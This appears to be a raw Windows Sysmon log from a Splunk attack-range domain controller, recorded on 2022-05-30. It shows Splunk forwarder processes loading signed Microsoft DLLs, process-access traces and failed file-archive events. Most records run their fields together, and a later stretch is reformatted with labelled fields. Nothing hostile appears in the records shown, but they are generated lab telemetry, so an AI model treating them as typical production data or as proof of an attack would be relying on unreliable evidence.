DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 
734700x800000000000000099300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000099299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000099298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 23542300x800000000000000099296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=068B4F48A3C1A637D5DD70AD8E624CEC,SHA256=EF90AEC9E5AAC7D5EC3E28A1787C7653B949EF1F1FA79DCAAC51C07DA26CAEB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x800000000000000099294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x800000000000000099289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:47.459{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:47.459{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.460{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000099282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.100{326FD73D-C0EE-6294-390B-000000005502}12764524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.100{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.100{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x800000000000000099340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:48.303{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3547493197D84A4C9220E342E0EF587E,SHA256=2C12E61913A7D8B9FE44751C27F0BAF3DD1CAC99AF4D0150042461342744360A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:48.193{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=EEF4A506B9FF9F68F1A0D841561505A0,SHA256=317F31DE483EFF77DE579DA57EECA8B0459DD5D6324E5DAA9083078FB82B11F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.709{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000099442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.709{326FD73D-C0F1-6294-3C0B-000000005502}13882596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.693{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.693{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 
734700x800000000000000099438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\bcrypt.dll | FileVersion=10.0.14393.4583 (rs1_release.210730-1850) | Description=Windows Cryptographic Primitives Library | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=bcrypt.dll | Hashes=MD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238D | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

[All records below share Channel=Microsoft-Windows-Sysmon/Operational, Computer=win-dc-ctus-attack-range-994.attackrange.local, Level=4, Opcode=0, Keywords=0x8000000000000000, Task=EventID and RuleName=-; the Sysmon schema version is given per record. Newest record first.]

EventID=7 ImageLoaded (Version=3) | RecordID=99434 | UtcTime=2022-05-30 13:04:49.553 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\wkscli.dll | FileVersion=10.0.14393.5066 (rs1_release.220401-1841) | Description=Workstation Service Client DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=WKSCLI.DLL | Hashes=MD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

EventID=7 ImageLoaded (Version=3) | RecordID=99433 | UtcTime=2022-05-30 13:04:49.553 | ProcessGuid={326FD73D-C0F1-6294-3C0B-000000005502} | ProcessId=1388 | Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe | ImageLoaded=C:\Windows\System32\netutils.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Net Win32 API Helpers DLL | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=NETUTILS.DLL | Hashes=MD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578 | Signed=true | Signature=Microsoft Windows | SignatureStatus=Valid

